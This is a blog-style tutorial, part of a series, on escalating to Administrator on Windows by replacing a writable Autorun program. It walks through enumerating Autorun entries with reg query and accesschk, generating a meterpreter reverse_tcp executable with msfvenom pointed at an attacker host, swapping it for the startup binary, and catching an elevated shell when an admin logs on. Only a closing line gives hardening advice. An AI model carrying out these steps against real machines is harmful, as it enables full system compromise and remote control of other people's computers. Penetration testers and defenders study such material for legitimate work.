Windows PrivEsc(4) - Autorun programs

This is the fourth of the Windows PrivEsc series, you can read the first of it which is about Unquoted Service Paths, the second which is about Hijacking DLLs and the third: Exploiting Weak Service Permissions.

Prerequisite

Target Machine: Windows 7 (works on all versions of Windows)

Attacker Machine: Kali Linux

Before I begin, I’m assuming we already have foothold on the Windows target (either a meterpreter session or a cmd shell). We will be utilizing native Windows commands and meterpreter modules to automate some of the processes. Let’s begin by learning how to identify and exploit Autorun programs to escalate our privileges.

Here, I have a meterpreter shell as a standard user who doesn’t belong to the Administrator group but in the end, we’ll get a new session where we will be running as the Administrator

standard user

Exploiting Autorun Programs.

Autorun is a Windows feature that is used to automatically to start applications and programs on Windows startup. The Autorun is disabled by default on latest Windows such as Windows 10 but Microsoft has provided users with the ability to enable it.

For our technique to work, we will have to enable Autorun on the target. We can elevate our privilege through Autorun by identifying programs that have been configured to run on startup as well as other that can be run by users with Administrative privileges.

1. First step involves identifying Autorun applications on the target. This can be achieved by running the following command in your Windows target’s cmd shell.

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Displayed is a list of Autorun applications on the target’s machine.

enumerate autorun programs

2. You can also achieve this + more info by using the accesschk utility tool. This is part of the sysinternals pack and can be downloaded here. Upload it to your target via a meterpreter upload or serve it on the attack machine and use certutil.exe to download it to the target.

Using a meterpreter upload:

upload Accesschk.exe

3. Now specifically enumerate a list of Autorun programs by running the following command:

.\accesschk64.exe -vwu “c:\Program Files\Autorun Program”

Enumerate Autorun Programs

-vwu: v stands for verbose mode, w means print only objects that have write access, u means suppress errors.
— accepteula: add this when you’re running the tool for the first time. It means you accept the license agreement of the tool. You don’t need to add this to your subsequent usage of the tool.

RW means the group has Read and Write permissions and can make changes to the content of the program directory.

In the above screenshot, we identified an executable program.exe. This executable has NT AUTHORITY\SYSTEM access permissions. And we have write access permissions in that directory. All we need to do is to replace the program.exe with our own generated binary payload. When the Administrator logs on, our payload runs as part of the startup programs and we will get an elevated meterpreter shell.

NB: This technique requires the admin to log on to the system for the Autorun program to run.

4. Generate a Windows executable payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker IP> LPORT=6161 -o program.exe

Generate payload

NB: The reverse payload should have the same name as the service we are trying to exploit and it should be uploaded to the exact service path.

5. After generating the payload, we upload it to the program path.

C:\Program Files\Autorun Program

Before uploading, it’s advisable to rename the original binary to something else. In case our reverse binary payload doesn’t work, we will have the option of restoring the original to how it was.

Rename it(to new name ‘old_program.exe’) with command:

mv program.exe old_program.exe

6. Navigate to the program path in your shell and upload the payload

upload program.exe

upload the payload

7. Start a listener and wait for a reverse connection the moment the administrator logs in

Start a Listener

8. The Administrator logs in.

Wait for Admin to log on

And a shell is returned

you catch a session

Calling a Windows CMD shell from meterpreter

downgrading to cmd shell

Administrator Profile

Admin user profile

Though Autorun programs can be a great in helping to be more efficient, they should be configured carefully, only allowing administrators to edit the actual executable or the registry key controlling the program’s path, as exploiting this misconfiguration could result in a full system compromise.

I hope you enjoyed this as much as I did. Reach out to me on Twitter @tinopreter Follow me for more cybersecurity related content while you’re at it.